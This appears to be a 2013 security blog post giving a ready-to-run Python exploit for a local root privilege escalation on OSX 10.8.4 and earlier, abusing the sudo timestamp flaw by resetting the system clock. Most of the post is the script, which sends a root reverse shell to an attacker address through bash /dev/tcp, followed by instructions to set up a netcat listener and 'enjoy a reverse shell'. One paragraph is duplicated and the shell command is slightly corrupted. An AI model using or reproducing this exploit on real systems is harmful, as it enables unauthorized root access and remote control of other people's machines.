August 29, 2013
OSX Local Root Privilege Escalation Exploit
Written by
David Kennedy
About five months ago, a bug was discovered on using the Date & Time settings within OSX 10.8.4 and below to perform a local privilege escalation from a normal user to root. The original flaw was a bug in Unix and sudo and allows the execution of changing the date and time to escalate to root permissions from a normal user. The flaw was recently put into the Metasploit Framework by Todd Miller (original bug discovery), Joev (wrote the module), and Juan, Vazquez (bug testing and module fixing).
This is a super simple exploit and if you don't have access to a Metasploit shell, here's a simple Python exploit you can run locally that will pipe a reverse OSX bash shell to you with root privileges.
This is a super simple exploit and if you don't have access to a Metasploit shell, here's a simple Python exploit you can run locally that will pipe a reverse OSX bash shell to you with root privileges.
#!/usr/bin/python
###################################################################################################
# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
# Date: 08-27-2013
# Exploit Author: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
# Tested On: OSX 10.8.4
#
# Reference: http://www.exploit-db.com/exploits/27944/
#
# Example below:
# trustedsec:Desktop Dave$ python osx_esc.py
# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444
#
# attacker_box:~ Dave$ nc -l 4444
# bash: no job control in this shell
# bash-3.2#
###################################################################################################
import subprocess
# IPADDR for REVERSE SHELL - change this to your attacker IP address
ipaddr = "192.168.1.1"
# PORT for REVERSE SHELL - change this to your attacker port address
port = "4444"
# drop into a root shell - replace 192.168.1.1 with the reverse listener
proc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
proc.stdin.write("systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo sunbash -i >& /dev/tcp/%s/%s 0>&1 &n" % (ipaddr,port))
print """
###############################################################
#
# OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell
#
# Written by: David Kennedy @ TrustedSec
# Website: https://www.trustedsec.com
# Twitter: @Dave_ReL1K
#
# Reference: http://www.exploit-db.com/exploits/27944/
###############################################################
"""
print "[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s" % (ipaddr,port)
Just edit the file, change the reverse ip-address to your attacker box and the port, run netcat or a standard socket listener on that port on the attacker machine, and run python osx_exploit.py and enjoy a reverse shell.
Reference: http://www.exploit-db.com/exploits/27944/